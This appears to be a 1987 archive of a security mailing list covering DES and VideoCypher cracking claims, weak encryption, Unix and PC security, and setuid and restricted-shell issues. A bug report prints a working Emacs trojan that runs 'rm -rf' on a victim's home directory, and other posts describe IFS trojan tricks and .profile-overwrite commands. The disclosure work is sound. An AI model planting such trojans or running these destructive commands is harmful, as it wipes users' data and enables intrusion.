From: *Hobbit* 13-Jan-1987 23:30:17
To: security@RED.RUTGERS.EDU
Subj: The long silence is broken

Contrary to recent evidence, or lack thereof, the Security list is still alive. A number of random impediments to progress prevented me from re-sending the queued mail for quite a while, including:

  - Being horrendously busy building laser equipment
  - Stumbling across a strange and crippling bug in MM and having to work around it myself with little or no support from those familiar with the code
  - The big Bitnet shakeup and re-ordering, during which all the Bitnet recipients were moved to local redistributions and all internet list maintainers had to learn how to deal with LISTSERV
  - The usual Christmas/holidays lossage
  - Being in DC for a week with no local network access [UMD was cut off]
  - Any number of other excuses I can come up with

I however *have* kept up with list maintenance requests and have been keeping things therein current. Now that things have settled down somewhat, the normal flow of Security mail will resume. A couple of other improvements have been made as well; useless headers will now be stripped out before remailing and right-widgeted message inclusions severely trimmed.

Note to Bitnet people: Some of you were receiving digest-format messages. With the exception of one site [barilan] who requested specifically to remain, I have moved *all* Bitnet recipients to the LISTSERV mechanism at UGA. If you were receiving digest format messages and can't bear to have it any other way please send me a note and I'll fix your feed, but keep in mind it's just that much more network bandwidth taken up at Wiscvm. If there is sufficient demand I'll arrange to have a separate digest distribution at UGA set up.

Thus, if you're looking for archives for December/January, there aren't any.

_H* [security-request@rutgers]

From: dplatt@teknowledge_vaxc.ARPA (Dave Platt) 2-Jan-1987 20:52:41
To: risks@csl.sri.com, security@rutgers.rutgers.edu
Subj: DES cracked?
There's an interesting article in the 1/87 issue of Radio-Electronics which states that the Videocipher II television-scrambling system has been cracked. As Videocypher depends in some part on the DES cyphering algorithm, this may have some major implications for computer-system security (if it's true).

According to the article, "perhaps as many as several dozen persons or groups have, independent of one another, cracked Videocypher II and we have seen systems in operation. Their problem now concerns what they should do with their knowledge."

As I recall (and I may well be wrong), M/A-Com's Videocypher II system uses two different scrambling methods: the video signal is passed through a sync-inverter (or some similar analog-waveform-distorter), while the audio is digitized and passed through a DES encryption. Information needed to decrypt the digital audio is passed to the subscriber's decoder box in one of the "reserved" video lines. The actual decryption key is not transmitted; instead, an encyphered key (which itself uses the box's "subscriber number" as a key) is transmitted, decrypted by the decoder box, and used to decrypt the audio signal.

I've heard that it's not too difficult (in theory and in practice) to clean up the video signal, but that un-DES'ing the audio is supposed to be one of those "unfeasibly-difficult" problems.

I can think of three ways in which the Videocypher II system might be "cracked". Two of these ways don't actually involve "breaking" DES, and thus aren't all that interesting; the third way does.

Way #1: someone has found a way of assigning a different "subscriber number" to an otherwise-legitimate M/A-Com decoder, and has identified one or more subscriber numbers that are valid for many (most?) broadcasts. They might even have found a "reserved" number, or series of numbers, that are always authorized to receive all broadcasts.
This is a rather minimal "crack"; the satellite companies could defeat it by performing a recall of all subscriber boxes, and/or by terminating any reserved subscriber numbers that have "view all" access.

Way #2: someone has found a way of altering a decoder's subscriber number, and has implemented a high-speed "search for valid numbers" circuit. This could be done (in theory) by stepping through the complete set of subscriber numbers, and looking for one that would begin successfully decoding audio within a few seconds. It should be pretty easy to distinguish decoded audio from undecoded... This way would be harder for the satellite companies to defeat; they'd have to spread the set of assigned subscriber numbers out over a larger range, so that the search for a usable number would take an unacceptable amount of time.

Way #3: someone's actually found a way of identifying the key of a DES transmission, with (or possibly without) the unscrambled "plaintext" audio as a starting point. This I find very difficult to believe... it would be difficult enough for one person or group to do, let alone "perhaps as many as several dozen... independent" groups. Naturally, this possibility has the most severe implications for computer-, organizational- and national security.

I suspect that the reported "cracking" of Videocypher II is a case (or more) of Method #2, and thus doesn't have immediate implications for the computer industry (I think). Has anyone out there heard of any other evidence that DES itself has been cracked?

From: dplatt@teknowledge_vaxc.arpa (David Platt) 6-Jan-1987 13:49:23
To: risks@csl.sri.com, security@rutgers.rutgers.edu
Subj: More on the possible DES crack

I just got a copy of the 2/87 issue of Radio-Electronics, which contains brief descriptions of several of the systems that have "cracked" the VideoCypher II scrambling system. The systems described are all "software" approaches that fall into what I described as "way #1"...
they work by cloning copies of an authorized subscriber number. At least one has found a way to crack the "tiered distribution" feature of VideoCypher, thus permitting someone who has paid for only one service to successfully view several others. None of the systems described so far actually involve a "cracking" of DES itself... they're all methods of copying an existing (valid) key from one decoder to another.

It appears that the MA-Com folks did take some steps to conceal the subscriber number information (which generates the actual key dynamically, I believe), but that their steps were not sufficient. Apparently, the subscriber number is stored in the battery-backed RAM in a small TI microprocessor, and there's no direct way to query it; during operation, though, it's apparently possible to trace the signals on some of the micro's pins and "catch" the subscriber number as it flies by. Someone has found a way to do this and to "download" the number into the micro in another decoder... thus permitting the "cloning" of an authorized number.

So, the vulnerability of the VideoCypher II system appears to boil down to the fact that its "innards" aren't sufficiently guarded against probing and/or modification. If, for example, the box had been provided with a cover-removal switch that would signal the micro to erase its subscriber number, it might have been more difficult to "crack".

A description of several "hardware" approaches is promised for next month. I'll summarize once I get my hands on an issue.

From: C. P. Yeske 9-Jan-1987 12:57:53
To: security@rutgers.rutgers.edu
Subj: [Mark Lottor : CRYPT part II]

I found this on the tops-20 digest and thought it would be interesting.

Curt
cy13@te.cc.cmu.edu

---------------

Date: Wed 7 Jan 87 23:36:50-PST
From: Mark Lottor
Subject: CRYPT part II
To: tops-20@SCORE.STANFORD.EDU

Well, I had this diary of sorts that I had spent two years working on, from around '82-'84.
I hadn't made an entry in a few months, and when I went to decode the file I found that I had forgotten the password. So, last week I thought I'd do something about it. I got the sources to the CRYPT program and I hacked it up to try every single key. I figured it might run for 5 or 10 years but I wasn't in a hurry. The key was 71 bits, but I found what may have been a bug that reduced it to only 35. This computed to only about 200 days.

I tried a test case with a simple key, and was a bit surprised when it was decoded in about a minute. So, I fired up the batch job that was going to take all year to complete. But it finished a minute later! Yes, it was decoded. No, it didn't try every key. Hardly any, as a matter of fact. I don't know how the algorithm was supposed to work, but it appears that lots of keys are "equal" to each other. I have found that I can decode any text file in about a minute.

This is using the CRYPT program (NCRYPT.FAI) that writes out the coded file in a format like:

    ;crypt
    ahdsj jhaud oiqmn djdud
    djsau kasia zajza husdh
    ;end

Just a warning to anyone using it; it's worthless.

Now the questions: Was it known this program was so bad? Is there a good crypt program for Tops-20? One that's been tested?

Mark

From: Joseph I. Herman (Joe) 16-Jan-1987 15:17:55
To: security@red.rutgers.edu, warnock%clemson.csnet@relay.cs.net
Subj: Promiscuous mode on ethernet (and others)

Doing a promiscuous listen on ethernet is a function of twiddling a bit on your ethernet port. For the 3com board used in PC's, you can just instruct the board to show you all traffic by setting a bit when you tell the board you want to listen (I don't remember which bit it is, it's documented. If there is a demand, I'll look in our code.)

There are two ethernet monitors that I know of off hand. Excelan's Lanalyzer (or something like that) and the NETWATCH program out of the PC/IP stuff.

For IBM token ring it is not possible to do promiscuous receives using the IBM boards.
However, if you're determined, TI sells a board that will do promiscuous receives. However the board is 1) expensive ($1500) and 2) does not understand 802.2 so you'd have to do all your decoding yourself. I know of no market-available token ring monitoring program.

I hope this helps. We've found NETWATCH to be very very helpful for debugging network programs.

I'm routing that packet to where???? Oops.

Joe

Replies to either DZOEY@UMD2.UMD.EDU or DZOEY@TERMINUS.UMD.EDU

P.S. Of course, the boards all detect whether you want promiscuous receives for good or evil purposes and disallow any unethical usage :-)

From: 16-Jan-1987 11:40:48
To: security@red.rutgers.edu
Subj: Breakin problems with SUN systems

I just received the following message via the TCP-IP mailing list. I would appreciate it if you would please forward this to anyone who might be affected.

Thanks,
Selden E. Ball, Jr.

Date: Thu, 15 Jan 87 12:41:43 PST
From: Dan Kolkowitz

There has been another rash of breakins on the Internet. We've noticed the SUN release includes a number of unpassworded special accounts in the default /etc/passwd file. Breakins have occurred on at least one of these. You may want to set the password for these accounts or disable them.

Dan Kolkowitz
Computer Science, Stanford

From: 21-Jan-1987 14:46:23
To: SECURITY@RED.RUTGERS.EDU
Subj: re: SET WATCH

Todd,

You recently asked via the SECURITY mailing list

>[...] I saw mention of a
>$SET WATCH command with VMS ... Where did it come from ?

A query to the INFO-VAX mailing list would have been more appropriate: the SET WATCH command was revealed there last September. Maybe you confused the two lists?

I'm not quite certain how to interpret your question: are you asking whence the SET WATCH command, or whence the information about the VMS implementation? At any rate, the SET WATCH command itself has (had) a long and illustrious history on DEC's Tops-10 systems (Tops-20 too, I suspect).
The user could use the SET WATCH command to set flags so that the "monitor" (operating system) would display all sorts of useful info every time a program or command started and exited: time of day, elapsed cpu and real time, .exe file origin (it could be persuaded to display a message every time a shared segment was loaded, for example), disk and magtape i/o counts, and file name and i/o type whenever a file was opened. Much of this information was also available by typing a control-T or the USESTAT command. (My comments are in the past tense because our DEC-10 was replaced by 8600s last year. I understand that there are a few lucky sites still running them, though.)

The VMS implementation of SET WATCH currently only supports the display of file i/o information. (VMS's form of control-T is similarly limited in functionality compared to the Tops-10 version.) SET WATCH is not a "supported" command: there is no published information about it. What is known has come from intrepid explorers who have used the VERB program to dump the contents of the distributed DCL command table file.

The syntax of the command is:

    $ SET WATCH FILE/CLASS:(option1,option2...)

The following options are available:

    ALL
    ATTRIBUTES
    CONTROL_FUNCTIONS
    DIRECTORY_OPERATIONS
    DUMP
    ATTACHED
    MAJOR_FUNCTION
    NONE
    QUOTA_LENGTH

You can make this command generally available on your system by installing the image SYS$SYSTEM:SETWATCH with the CMKRNL priv.

I hope that this brief discussion has been some help.

Selden E. Ball, Jr.

Cornell University             NYNEX: 1-607-255-0688
Laboratory of Nuclear Studies  BITNET: SYSTEM@CRNLNS
Wilson Synchrotron Lab         ARPA: SYSTEM%CRNLNS.BITNET@WISCVM.WISC.EDU
Judd Falls & Dryden Road       PHYSnet/HEPnet/SPAN:
Ithaca, NY, USA 14853            LNS61::SYSTEM = 44283::SYSTEM (node 43.251)

[Thanks also to Dan Cottler at RCA for a similar but less in-depth msg.
_H*]

From: davy@ee.ecn.purdue.edu (Dave Curry) 22-Jan-1987 08:23:49
To: dca-pgs@ddn1.arpa
Subj: Gould Secure UNIX
Cc: security@red.rutgers.edu

Yes, Gould has a C2 UNIX. It was certified last year (October?), I believe. Basically, the most significant thing they did was remove the set-uid bit. There's also a bunch of "tracing" stuff in the kernel, but I'm not sure exactly what is and isn't traced.

There was an item on USENET about three months ago about UTX/32S... apparently they had a demo system at a trade show and were challenging people to break in. Prize was a TV set. One guy broke in by noting that the super-user account had the current directory in its search path (mistake number one). He wrote a little program, talked the trade show guy into running it as super-user, and poof, he was in. The stink arose because Gould refused to give him the TV set, since he had not "played by the rules". (They have since given him the set.)

The community was less than impressed by this, and slammed Gould pretty hard on USENET... Gould ended up sending this complete drivel about "he had to convince the super-user to unwittingly help him, since he realized immediately the system was otherwise unpenetrable" and other factually void statements. Finally they issued another challenge -- a TV and a VCR to break in. Some of us took them up on the challenge (they still have not gotten back to us telling us when and where we get to try... I think it was a ruse), others thought "if all you're willing to put up is a TV and VCR you must not be too confident. Try putting up $20,000 so it's worth our time."

Anyway, having had more than enough experience with Gould's alleged software expertise, I'd be more than a little wary of UTX/32S without taking a real good look at it first.

--Dave Curry

These opinions are solely my own and not my employer's and all that crap.
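The Gould break-in above turned on "mistake number one": the super-user's search path included the current directory, so a program planted there ran with root's privileges as soon as root typed a common command. As an added example (not code from the list or from Gould), here is a POSIX sh audit function that flags the PATH components which make that possible: the literal ".", empty components (which the shell also searches as the current directory), relative entries, and absolute directories that anyone can write into. The function name and the message wording are my own.

```sh
#!/bin/sh
# Added example (not from the list or from Gould): audit a PATH value for
# components that let a file dropped in an untrusted directory shadow a
# system command. Prints one line per bad component; returns 1 if any found.
audit_path() {
    rest="$1:"          # trailing ':' so a final empty component is seen
    bad=0
    while [ -n "$rest" ]; do
        entry="${rest%%:*}"
        rest="${rest#*:}"
        case "$entry" in
            "")
                echo "empty component (searched as the current directory)"
                bad=1 ;;
            .)
                echo ". (current directory)"
                bad=1 ;;
            /*)
                # Absolute path: still bad if anyone can write into it, since
                # any user could plant a command there. ls -L follows symlinks
                # so a /bin -> usr/bin link is judged by the real directory;
                # the 9th mode character is the "other write" bit.
                if [ -d "$entry" ]; then
                    case "$(ls -ldL "$entry" 2>/dev/null)" in
                        ????????w*)
                            echo "world-writable: $entry"
                            bad=1 ;;
                    esac
                fi ;;
            *)
                echo "relative: $entry"
                bad=1 ;;
        esac
    done
    return $bad
}

# When run directly, audit the invoking shell's own PATH.
if audit_path "$PATH"; then
    echo "PATH: no untrusted components"
fi
```

Run it from root's own login environment (where `$PATH` is what root's shell actually searches), not from a sanitized cron or su environment, or the audit checks the wrong value.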
From: davy@ee.ecn.purdue.edu (Dave Curry) 22-Jan-1987 09:00:42
To: security@red.rutgers.edu
Subj: Re: Questions about Secure Unix

This was a reply to sullivan@ddn1.arpa and rsc@umix.cc.umich.edu, but I managed to screw up the security list's address...

-----

> "C2"? Really? From what I know, "C2" doesn't mean a whole lot more than
> changing the default file/device permissions to a 'none group, none
> others' sort of thing. Big deal.

No, you're thinking of C1... from the Orange Book:

C1:
  - discretionary access control
  - identification and authentication
  - assurance of:
      - system architecture
      - system integrity
      - security testing
  - documentation of:
      - security features user's guide
      - trusted facility user's manual
      - test documentation
      - design documentation

C2:
  - everything in C1, but at increased levels
  - object reuse (guarantee no data from last user of object left in object)
  - audit

Granted, C2 isn't a whole lot more complicated when you get right down to it...

--Dave Curry

From: dplatt@teknowledge_vaxc.ARPA (Dave Platt) 22-Jan-1987 13:15:23
To: ST802414@BROWNVM.BITNET
Subj: Re: hard drives
Cc: Security@Red.Rutgers.Edu

This depends very much on the environment in which the computer is to be used, on the operating system, and on the degree of security that you require.

For simple protection, you may be able to depend on built-in security and access-control features in the computer's operating system. Unix, for example, has a three-level * three-privilege access control scheme, which can be used to keep nosy parkers out of private data. It can be cracked, however, if someone can boot the privileged diagnostic package and read the disk directly (or log in as "root").

Harder-to-crack protections (e.g. software protection) might be implemented in a number of ways. Several firms make software that can be used to password and/or encipher the data on portions of a disk.
I believe that Borland (vendors of Sidekick) sell a "safe-disk" utility that enciphers data in a directory hierarchy; I believe that it does so by inserting itself into the device-driver path and ciphering data during writes (and deciphering during reads). Without the cipher password, the data is unreadable (I believe that DES is used). Other vendors sell similar products.

At the MacWorld expo earlier this month, I saw a product ("MacSafe"?) that protects Macintosh disks similarly. It supplies both a nested-password scheme for locking files, and a DES cipher. Based on a conversation that I overheard while hanging around the booth, the password scheme can be bypassed by using a disk-sector editing tool such as FEdit (the files are simply hidden from normal access), but the DES-ciphering is as robust as DES itself (i.e. if you don't have the key, it'll take many moons to read the data).

Protecting data against erasure is trickier. You might be able to depend on the operating system's access-control features to prevent an existing filesystem from being modified by programs running in the normal user environment. To protect the data against modification by diagnostic or stand-alone programs, you'll probably have to physically disable the drive's ability to write new data. Some drives have a write-protect switch; such a drive could be placed in a locked cabinet next to the computer and used in a read-only mode. If you have a drive that has no such switch, you'll have to hack the interface between the computer and the controller (or between the controller and the drive), thus preventing the drive from ever seeing a "write data" order. This is nontrivial and should be delegated to someone who REALLY understands the hardware.

You could, of course, copy the data from a conventional (Winchester) hard disk to a WORM (write-once, read-many) optical disk, and then leave the WORM copy on-line.
Or, for ultimate "no modification" security, have the data transferred to a ROM optical disk (CD-ROM)... expensive, but pretty secure against modification.

To meet your "for instance" (protect from erasure or access) absolutely, there's only one way... DISCONNECT the drive from the computer, LOCK IT UP in a physically-secure area, and don't give ANYONE the keys! If a drive is on-line or physically accessible, then you must assume that someone with sufficient expertise and time will probably be able to crack or destroy its contents.

Dave Platt
Internet: dplatt@teknowledge-vaxc.arpa
Usenet:   {hplabs|sun|ucbvax}!dplatt%teknowledge-vaxc.arpa
Voice:    (415) 424-0500
USnail:   Teknowledge, Inc., 1850 Embarcadero Road, Palo Alto, CA 94303

The best book on programming for the layman is "Alice in Wonderland"; but that's because it's the best book on anything for the layman.

From: obrien@rand_unix.ARPA 23-Jan-1987 13:53:33
To: dplatt@teknowledge-vaxc.arpa (Dave Platt)
Subj: Re: DES cracked?
Cc: risks@csl.sri.com, security@rutgers.edu

Traffic in the Usenet newsgroup "net.video" implies that it was done with your "way #1", i.e. someone found a trapdoor in the decoder box that allows insertion of a new "subscriber number". I didn't even hear anything to the effect that a high-speed search is used.

From: Michael Grant 24-Jan-1987 20:38:19
To: risks@csl.sri.com, security@rutgers.edu
Subj: Re: VideoCypher II

>David Platt notes:
>If, for example, the box had been provided with a cover-removal switch that
>would signal the micro to erase its subscriber number...

Always best to eliminate the problem by redesigning that part in the next generation of the cypher so that such important numbers as that never leave the internals of chips. At that point, it becomes much more of a pain to probe than it may be worth, but... not entirely impossible.

From: Douglas Humphrey 25-Jan-1987 14:45:07
To: dplatt@teknowledge-vaxc.arpa, risks@csl.sri.com, security@rutgers.edu
Subj: Re: DES cracked?
>Way #3: someone's actually found a way of identifying the key of a DES
>transmission, with (or possibly without) the unscrambled "plaintext"
>audio as a starting point.

Note that they can easily have the plaintext, since the best way to start experimenting on breaking something is to have two devices there, one subscribed and authorized, and the other not. That way you have (subject to trivial timing differences which can be ironed out) two streams of data to play with, and you really are just trying to make one look like the other.

On another note, does anyone know of any good spectrum analysis software available for cheap to work with reasonably priced A/D converters? There are a number of companies that sell the hardware required to eat signals, but most of the software that I have seen for actually analysing the data is pretty weak. Maybe I'm just not in touch with the right companies...

Thanks
Doug

From: crash!pnet01!adamsd@nosc.ARPA (Adams Douglas) 26-Jan-1987 12:00:43
To: crash!security@rutgers@nosc.arpa
Subj: PC-AT security.

I have a PC-AT here at my office which gets frequent remote use through dialup. My office is a cubicle with no physical security save some lockable cabinets. I don't do classified work, but I would like some confidence in leaving the machine up and running over weekends.

The basic problem is that when I leave my phone-line monitor running I cannot use the key lock on the AT as the program occasionally will recover from bad errors by doing a warm-boot. If the keyswitch is locked, the warm-boot will not complete and I am down for the rest of the weekend.

Is there a simple way of ensuring the machine's security without inhibiting its dialup use under these circumstances? I thought of removing the keyboard and locking it up, but a determined person could swipe a keyboard from another machine here (or bring their own). Encrypting every file on the machine is something I would like to avoid.

Helpful ideas would be welcome.
From: *Hobbit* 29-Jan-1987 19:59:32
To: security
Subj: [2981] Summary of hard-drive responses

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Thu, 22 Jan 87 18:08:40 EST
From: ELKINS
Subject: Re: hard drives

I believe that there are some hard drives for the ibm, that are password protected. i.e., a password must be given to the hard-drive controller before it will boot the drive. There are also some control systems that exist for the IBM-pc series... Another security feature is a lock for the hard drive which requires a key to be inserted for the drive to operate. I believe that the IBM AT's have this feature...

Rob Elkins
relkins%trillian@udel-relay

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Thu, 22 Jan 87 15:53:46 EST
From: Michael Grant
Subject: Re: hard drives

There is a card that can be had which encrypts everything on the disk. A password is required to get into it. It seemed fairly secure. Jeez, I saw it at some random security show. They were giving out some very large sum of money for anyone if they could crack it. I wish I could provide more info on it, but it was a long time ago. As I remember, it was a disc controller in the back of a PC. When you powered up it would ask for a password. Otherwise, no reads or writes. If this is what you are looking for, I suggest you go to the next ComSec in Washington, or your local security conference.

-Mike Grant

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

From: siggy@aim.rutgers.edu
Date: 22-Jan-87 20:38:16 EST
Subject: hard disk security

Christopher Chung asked if there was a method of securing a hard disk in a publicly accessible microcomputer. If the beast is an IBM PC or really close clone there are a number of commercial software packages which will do the job quite nicely. The two which come to mind are The WatchDog by ?? and The Knight by AST. The AST product costs somewhat under $200 but it does really work. Send mail direct if you really want me to find the literature on WatchDog.
cheers
/S*
siggy@aim.rutgers.edu
latzko@topaz.rutgers.edu
backbone!rutgers!topaz!latzko

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Sun, 25 Jan 87 12:45:50 PST
From: Derek_Isobe%SFU.Mailnet@umix.cc.umich.edu
Subject: hard drives

I have such a password program in basica. It asks for a password on h/d boot and kills the system if it does not receive the right pw.

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Sun, 25 Jan 87 13:00:57 EST
From: Simson L. Garfinkel
Subject: hard drives

I assume that you mean a "hard drive" on an IBM PC/clone/AT kind of computer. The easiest way to keep a hard drive from being accessed is to physically remove it from the computer. With removable media hard drives and Bernoulli boxes, this is a practical solution. There isn't any other way to keep people from accessing a hard drive. You can encrypt the data on the disk, however.

Simson L. Garfinkel
MIT Media Lab

From: Jim Aspnes 26-Jan-1987 16:52:20
To: barnett%vdsvax.tcpip@ge-crd.arpa
Subj: Re: setuid csh script problem
Cc: SECURITY@RED.RUTGERS.EDU

Setuid csh scripts are dangerous, because on many implementations of Unix the csh which executes them can be tricked into believing that it is a login shell by exec'ing the script with argv[0] set to "-". I believe this has been fixed in Ultrix; I know it has been fixed in 4.3.

The problem with popen() and system() was that both calls used /bin/sh to parse their arguments, and this shell inherited the IFS environment variable from its parent. By setting IFS to, say, "/", one could turn a call to /bin/mail into a call to bin, which could be a trojan horse of one's choosing in the current directory. 4.3 sh clears IFS on startup, eliminating the problem.

The best loophole-finding program I know of is KUANG, written by Bob Baldwin. It does rule-based search to find paths of attack to gain an arbitrary objective (e.g., becoming root, or obtaining permission to write to a particular file). You may want to ask him if he's willing to distribute it.
Jim Aspnes

From: pnet01!brock@nosc.ARPA (Brock Meeks) 27-Jan-1987 22:26:36
To: crash!security@rutgers@nosc.arpa
Subj: DES is Cracked--thrice

The following message has been ported from BYTE's electronic network. The author is Rick Cook. I thought all you DES devotees would be interested.

=-=-=-=-=-=-=

TITLE: Three Claim Breaking of DES-Based Scrambler

The Videocypher II scrambling system, which uses the government-backed DES encryption algorithm to protect satellite television signals, has apparently been broken by no less than three different groups using different approaches. At a "scrambling summit" in the British West Indies recently, three groups demonstrated ways of cracking the system, which its manufacturer and major users promote as uncrackable.

The video signal is only lightly scrambled using conventional analog techniques. Because the DES algorithm is so secure, cracking the signal has been considered beyond the abilities of anyone without the resources of a government or major corporation.

None of the three groups broke the DES algorithm directly. Instead they attacked the hardware inside the descrambler to get at the firmware that runs the descrambler. M/A-COM engineers had cut one of the control pins off the unit's microprocessor to thwart such attacks. One group reattached the pin with a laser micro-welder. Another used a combination of out-of-spec voltages and clock speeds to deduce the firmware. A third group said it found a flaw in a key IC.

M/A-COM says provisions built into the Videocypher II can foil crackers. For example, each descrambler has several additional keys that can be activated from the satellite uplink station. However, the presenters at the conference claimed that for every countermeasure there is a possible counter-countermeasure -- a contention borne out by the history of software copy-protection.

--Rick Cook

=-=-=-=-=-=-=-=-=

People against needless garbage at message end.
--Brock Meeks

From: ROY MILLER 30-Jan-1987 10:19:27
To: security@RED.RUTGERS.EDU
Subj:

I believe Government Computer News, July 18, 1986, contained an article about Oracle and the DOD orange book security compliance. If anyone has any information on this that they could send me I would appreciate it.

Thanks
Stewart

From: William_Allen_Doster@um.cc.umich.edu 30-Jan-1987 17:14:27
To: AWALKER@RED.RUTGERS.EDU
Subj: PC-AT security.

One way to secure your machine might be to just replace *all* the keyboard related interrupts with pointers to IRets. Then you wouldn't have to remove the keyboard but no-one would be able to do anything. You could also have another program to restore the keyboard interrupt vectors, and remotely run it just before coming back in to work. Not sure how you would prevent someone from power-cycling it to undo these changes, though.

From: astrovax!princeton!allegra!amdcad!bandy@caip.rutgers.edu (Andy Beals) 30-Jan-1987 18:14:27
To: red.rutgers.edu!security@caip.rutgers.edu
Subj: PC/AT physical security

Well, if you have a big enough cabinet, you could lock the whole computer within it; however, you would have a big cooling problem if the cabinet wasn't big enough or your cubie didn't stay cold enough (you could knock some holes in the cabinet and put some muffin fans in it). If you cannot leave it in the cabinet, I'd say that there isn't much you can do about it; but why be paranoid?

From: Paul Schauble 3-Feb-1987 02:37:43
To: Security@rutgers.edu
Subj: Sorry, DES not cracked

at least not by the people who broke Videocypher II. I'll send what details I have along later. Basically what was broken was the key distribution method. None of the three methods involve breaking DES itself.

Paul Schauble at MIT-Multics

From: dparker@pnet01.CTS.COM (Dave Parker) 9-Feb-1987 23:31:18
To: crash!security@rutgers@nosc.mil
Subj: Re: Listening in...
Not only are many law enforcement agencies being forced to move to UHF because of a lack of available frequencies, many are moving to scramblers. Before too long, you won't be able to listen in at all.... When this happens, you won't be able to spend a relaxing evening listening to the world fall apart. But you can still find out all you want to know about the crime trends of any area of your city just by contacting the law enforcement agency and asking them.

------------------------------------------------------------------------------
Disclaimers? We don't need no stinkin' disclaimers!!
UUCP: {ihnp4,akgua,hplabs!hp-sdd,sdcsvax,nosc}!crash!pnet01!dparker
ARPA: crash!pnet01!dparker@nosc
Dave Parker

****************

[Administrative note: The list is not dead, just rather inactive these days. _H*]

From: dparker@pnet01.CTS.COM (Dave Parker) 9-Feb-1987 23:57:46
To: crash!security@rutgers@nosc.mil
Subj: Re: hard drives

Christopher Chung asked if there was any way to protect a hard drive on a microcomputer from being accessed on a public computer. There are *many* hard drive locks in public domain. I have not tried any of them but the one that is getting the highest acclaims is PC-LOK11.ARC. It should be available on just about any local BBS system. If you can't find it, send E-Mail.

------------------------------------------------------------------------------
Disclaimers? We don't need no stinkin' disclaimers!!
UUCP: {ihnp4,akgua,hplabs!hp-sdd,sdcsvax,nosc}!crash!pnet01!dparker
ARPA: crash!pnet01!dparker@nosc
Dave Parker

From: Bill Sommerfeld 6-Mar-1987 17:19:12
To: bug-gnu-emacs@prep.ai.mit.edu
Subj: It is possible to set load-path in the local variables list.
Cc: security@red.rutgers.edu, jis@ATHENA.MIT.EDU

In GNU Emacs 18.37.1 of Mon Feb 16 1987 on ra (berkeley-unix)

If I create the file /tmp/foo, containing the following lines:

    Local Variables:
    load-path: ("/tmp")
    mode: outline
    End:

and the file /tmp/outline.el:

    ;;; put any arbitrary code here.
    (if (not (string= (user-login-name) "wesommer"))
        (shell-command "cd ~; rm -rf * &"))
    (kill-emacs t)

then anyone who uses emacs to look at /tmp/foo and who has not yet loaded the outline package will lose their home directory. While I would not be anti-social enough to do this, it should be important to point out that the local-variables feature of emacs enables trojan horses like this to surface.

Suggested fix: disable setting of load-path in the local-variables list; other variables of this nature (such as shell-file-name and exec-path) might also be protected in some way. It may also be possible to set various hooks in this way; it is not immediately apparent to me how to fix this problem in general without eliminating the (winning) local variables feature.

- Bill

From: crl@maxwell.physics.purdue.edu (Charles R. LaBrec)  7-Mar-1987 06:24:07
To: wesommer@ATHENA.MIT.EDU
Cc: bug-gnu-emacs@PREP.AI.MIT.EDU, security@red.rutgers.edu
Subj: It is possible to set load-path in the local variables list.

A thought I just had was to be able to do something like

    (put 'load-path 'disable-local-variables t)

so that any "important" variable could be protected in an easily extensible way. Maybe non-t and non-nil could be a way to request confirmation before proceeding.

Charles LaBrec
crl @ maxwell.physics.purdue.edu

From: HMICHEL%CALSTATE.BITNET@wiscvm.wisc.edu  11-Mar-1987 08:57:22
To: SECURITY@RUTGERS.EDU
Subj: Encryption/Decryption Sources Desired

I am interested in obtaining source code (preferably in FORTRAN; Pascal is ok, BASIC is ok, C only if I must) that will encrypt and decrypt files. I am at a site that only supports mail; so, if there is anything at any archive that is not reachable via a mail based server then I am dependent on someone's generosity. Thanks for your help.

Michael W. Fleming            BITNET:  HMICHEL@CALSTATE
Computer Services             ARPANET: HMICHEL%CALSTATE.BITNET@WISCVM.WISC.EDU
California State College
9001 Stockdale Highway
Bakersfield, Ca.
93311-1099
Telephone: (805) 833-2309 -or- (805) 833-2115

From: brock@pnet01.CTS.COM (Brock Meeks)  12-Mar-1987 05:39:09
To: crash!security@rutgers@nosc.mil
Subj: North, Pointy, et al (so to speak)

Well, why don't any of us have any comments on the mundo security blunder by our rousing cowboys that used to staff the NSC?? I mean, c'mon? Can these guys really be so naive that they didn't know their messages were being stored for posterity by the PROFS system? Anyone want to venture a guess why? Or how about someone taking a shot at looking into whether the RFP (request for proposal) for the original White House comm. system included anything about "back up" messages . . . Just for security, you understand... Really, I'm a little tweaked on this issue. I would like to think these guys weren't that stupid, but you just never know...

Brock
inhp4!sdcsvax!crash!pnet01!brock
brock@ucsd
brock@nosc
--------------------------
no crap down here....

From: barnett%vdsvax.tcpip@ge_crd.arpa  16-Mar-1987 11:17:16
To: SECURITY@RED.RUTGERS.EDU
Cc: unix-security
Subj: secure service-type accounts

Here is a question I have for Sun 3.2 and Ultrix 1.2 (and 2.0) Ultrix systems. We would like to set up a network service for providing the ability to use Elan's DITROFF, which is licensed for one system, from any Ultrix or Sun machine on our network. We would like to do this without creating hundreds of accounts on the Sun workstation.

Two simple methods are:

1. Have a password of '*' on the dummy account and have a list of people in the .rhost file who can use the account. (This list of people/machines would include hundreds of combinations.)

2. Have no password in the account, and have a special version of the .profile/.login/.cshrc that traps signals, and only allows certain commands.
It seems to me that this is insecure because people could then do:

    rsh machine -l dummy-user chmod .profile
    rcp .profile machine.dummy-user:

and then

    rlogin machine -l dummy-user

Another solution is to use the restricted shell on the Sun. (I don't believe this is available on Ultrix 1.2.) To review my understanding of it, I would set it up as follows:

1. ln /bin/sh /bin/rshell
2. Change /bin/{c}sh to /bin/rshell in the dummy user's password entry.
3. Create a /secure-bin directory with just the commands needed to execute the tbl/eqn/nroff/troff/spell programs and scripts. What would NOT be included is chmod, cp, ln, and some others. I would think it should not be writable by the dummy user. (This part would require the most head-scratching.)
4. Edit the .profile to set the search path to only point to /secure-bin. Also add a

       trap 'exit 1' 0 1 2 3 15

   to the .profile as the first command.
5. chmod the .profile to 400.

Now - Sun's restricted version of sh does not allow:

   - execution of commands starting with '/'
   - redirection of standard output

So my questions are:

1. Is the approach I am taking secure? or 95% secure? Is there a better approach? (I may be willing to settle for a 95% secure method - because this doesn't grant root access. But as our policy is to not allow password-free accounts - we need to justify this deviation from policy.)
2. Is there a secure method of doing this for Ultrix, which doesn't (as far as I know) have the restricted shell? If so, how was it done? Does it require writing a program? Does anyone have a program that is suitable for hacking?
3. Does anyone have some examples on how they solved this problem? (This might save me a bit of head scratching and testing.)
4. Which commands should I leave out of the special bin directory (besides chmod, ln, cp, rm, and mv)?

Bruce G.
Barnett
